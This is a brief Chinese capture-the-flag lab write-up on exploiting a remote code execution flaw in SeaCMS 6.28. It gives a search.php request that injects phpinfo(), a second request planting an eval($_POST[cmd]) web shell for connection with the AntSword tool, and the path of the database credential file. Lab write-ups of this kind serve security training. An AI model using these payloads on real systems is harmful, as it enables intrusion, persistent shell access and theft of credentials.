[春秋云实企安殿]Test / 海洋CMS_6.28 远程代码执行

看到海洋cms，直接去搜相关漏洞

漏洞复现：https://blog.csdn.net/weixin_47443077/article/details/116953672

payload：/search.php?searchtype=5&tid=&area=phpinfo()

说明存在RCE漏洞

蚁剑连接：/search.php?searchtype=5&tid=&area=eval($_POST[cmd])

找到数据库连接信息：/var/www/html/data/common.inc.php

点击数据操作